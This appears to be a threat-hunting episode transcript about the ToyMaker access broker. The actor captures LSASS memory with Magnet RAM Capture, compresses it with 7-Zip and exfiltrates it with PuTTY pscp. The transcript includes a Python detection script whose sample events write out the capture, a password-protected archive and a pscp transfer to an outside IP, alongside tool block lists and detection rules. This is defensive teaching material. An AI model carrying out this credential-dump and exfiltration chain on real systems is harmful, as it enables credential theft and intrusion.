Welcome back to the Threat Hunters Corner! I’m Josh Shepard, Principal Threat Hunter at RADICL, and in this episode, we’ll be diving into the tools and tricks employed by a new Initial Access Broker known as ToyMaker.
Hey everyone, how's it going?
Josh Shepard here, and on this edition of the Threat Hunters Corner, we're diving into the activities of a new initial access broker (IAB) known as Toy Maker.
To refresh your memory, an initial access broker is a type of threat actor specializing in gaining initial persistent access to an environment. They then sell this access to the highest bidder, typically ransomware-as-a-service (RaaS) operators or their affiliates. These buyers leverage the persistent access to move laterally within the network and deploy their malware of choice.
Toy Maker has been observed collaborating with several ransomware gangs, including well-known groups such as Cactus. What sets Toy Maker apart is their innovative approach to credential gathering.
Toy Maker focuses on using legitimate tools for credential access. Specifically, they employ the open-source Magnet RAM Capture tool for OS credential dumping. Magnet RAM Capture is a legitimate digital forensics tool used to dump system memory. By capturing live system memory, attackers can access the LSASS (Local Security Authority Subsystem Service) process memory to gather credentials. These credentials are then packaged into their initial access offering, providing buyers with enhanced capabilities for lateral movement and privilege escalation.
After capturing the live system memory, Toy Maker continues to use legitimate tools to avoid detection. They use 7-Zip to compress the RAM capture and the PuTTY SCP client to transfer the file off-network. This trend of using malware-free, legitimate tools has been highlighted in CrowdStrike's 2025 Threat Report.
If your organization does not use Magnet RAM Capture or lacks a go-to forensics tool, consider blocklisting execution of these binaries, either by file hash or by file name. Additionally, you can detect and prevent unauthorized forensics tools by monitoring the command-line parameters unique to Magnet RAM Capture. Those parameters are harder for a threat actor to alter than a file name or a file hash, since the tool still has to be invoked the same way to do its job.
Another critical aspect to monitor is the use of the PuTTY SCP client for data exfiltration. If your organization does not use PuTTY, you can implement blanket detection or prevention measures. If PuTTY is used but only for SSH, restrict the usage of the PuTTY SCP client to prevent unauthorized data transfers.
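The two detection ideas above (catching Magnet RAM Capture by hash, file name or command-line flags even when the binary is renamed, and treating pscp.exe as an exfiltration channel unless it goes to an approved destination) can be combined into one simple rule set that also correlates the full capture, compress, transfer chain per host. The code below is an added example written for this post, not RADICL's detection content and not anything from the ToyMaker reporting. The sample events are constructed Sysmon-style process-creation records, the SHA-256 values are placeholders rather than real hashes, the Magnet RAM Capture file names and `/accepteula /go /silent` flags are assumptions you should confirm against your own copy of the tool, and the allowed pscp destination is a hypothetical internal host.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (Sysmon Event ID 1 style).
# Not real telemetry; hashes are placeholders, not real file hashes.
# ws01 shows the ToyMaker-style chain with the capture tool renamed to update.exe.
SAMPLE_EVENTS = [
    {"ts": 100, "host": "ws01", "image": r"C:\Users\svc\Downloads\update.exe",
     "cmdline": "update.exe /accepteula /go /silent", "sha256": "PLACEHOLDER_MRC_SHA256"},
    {"ts": 160, "host": "ws01", "image": r"C:\Program Files\7-Zip\7z.exe",
     "cmdline": r"7z.exe a -pSecret C:\Temp\ws01.7z C:\Temp\ws01.raw", "sha256": "PLACEHOLDER_7Z_SHA256"},
    {"ts": 220, "host": "ws01", "image": r"C:\Users\svc\Downloads\pscp.exe",
     "cmdline": r"pscp.exe -pw Secret C:\Temp\ws01.7z backup@203.0.113.5:/tmp/", "sha256": "PLACEHOLDER_PSCP_SHA256"},
    {"ts": 300, "host": "ws02", "image": r"C:\Tools\pscp.exe",
     "cmdline": r"pscp.exe C:\Logs\app.log admin@10.0.0.7:/srv/logs/", "sha256": "PLACEHOLDER_PSCP_SHA256"},
    {"ts": 400, "host": "ws03", "image": r"C:\Temp\MRCv120.exe",
     "cmdline": "MRCv120.exe", "sha256": "PLACEHOLDER_OTHER_SHA256"},
    {"ts": 500, "host": "ws04", "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe", "sha256": "PLACEHOLDER_NOTEPAD_SHA256"},
]

# Assumed file names and flags for Magnet RAM Capture; confirm against your own copy.
MRC_NAMES = {"mrcv120.exe", "magnetramcapture.exe"}
MRC_FLAGS = {"/accepteula", "/go", "/silent"}
BLOCKED_HASHES = {"PLACEHOLDER_MRC_SHA256"}      # placeholder, fill from your own inventory
ARCHIVERS = {"7z.exe", "7za.exe"}
PSCP_ALLOWED = True                               # False if PuTTY is not used at all
PSCP_ALLOWED_DESTS = {"10.0.0.7"}                 # hypothetical approved internal host

# Matches the scp-style "user@host:path" argument; {2,} keeps "C:\path" drive letters out.
DEST_RE = re.compile(r"^(?:[\w.\-]+@)?([\w.\-]{2,}):")


def image_name(ev):
    """Basename of the executed image, lower-cased for comparison."""
    return ev["image"].rsplit("\\", 1)[-1].lower()


def detect_memory_capture(ev):
    """Return the list of indicators that fired: 'hash', 'filename', 'cmdline'."""
    reasons = []
    if ev["sha256"] in BLOCKED_HASHES:
        reasons.append("hash")
    if image_name(ev) in MRC_NAMES:
        reasons.append("filename")
    flags = {tok.lower() for tok in ev["cmdline"].split() if tok.startswith("/")}
    # Two or more of the tool's flags together survive a simple rename of the binary.
    if len(flags & MRC_FLAGS) >= 2:
        reasons.append("cmdline")
    return reasons


def detect_pscp(ev):
    """Return an alert string for a pscp.exe execution that violates policy, else None."""
    if image_name(ev) != "pscp.exe":
        return None
    if not PSCP_ALLOWED:
        return "pscp.exe executed but PuTTY SCP is not approved in this environment"
    dests = [m.group(1) for tok in ev["cmdline"].split() for m in [DEST_RE.match(tok)] if m]
    bad = [d for d in dests if d not in PSCP_ALLOWED_DESTS]
    if bad:
        return "pscp.exe transfer to unapproved destination: " + ", ".join(bad)
    return None


def detect_chain(events, window=600):
    """Per host: memory capture, then an archiver, then pscp.exe inside `window` seconds."""
    by_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        by_host[ev["host"]].append(ev)
    hits = []
    for host, evs in by_host.items():
        cap_ts = arc_ts = None
        for ev in evs:
            name = image_name(ev)
            if detect_memory_capture(ev):
                cap_ts, arc_ts = ev["ts"], None
            elif cap_ts is not None and name in ARCHIVERS and ev["ts"] - cap_ts <= window:
                arc_ts = ev["ts"]
            elif arc_ts is not None and name == "pscp.exe" and ev["ts"] - cap_ts <= window:
                hits.append((host, cap_ts, ev["ts"]))
    return hits


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["host"], image_name(ev), detect_memory_capture(ev), detect_pscp(ev))
    print("chains:", detect_chain(SAMPLE_EVENTS))
```

Note that the renamed binary on ws01 still trips the hash and command-line rules, while the untouched MRCv120.exe on ws03 is caught by name alone; the pscp.exe run on ws02 to the approved host produces no alert. The chain rule is the one to prioritize for response, since a capture followed within minutes by archiving and an outbound SCP transfer matches the exfiltration pattern described above rather than a lone forensic analyst at work.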
Digital forensic tools can gather extensive information from a system. Therefore, maintaining strict control over what is allowed to execute on your systems is crucial. This not only helps in catching malicious activities but also ensures that internal analysts do not perform unauthorized actions.
While Toy Maker employs legitimate tools to evade detection, understanding your environment and knowing which tools are in use can help you implement aggressive detection and prevention measures. This approach will not only help you catch Toy Maker but also deter other threat actors who might copy their techniques.
That's it for this week's Threat Hunters Corner. If you have any questions, please feel free to reach out. Stay safe out there, and we'll see you next week.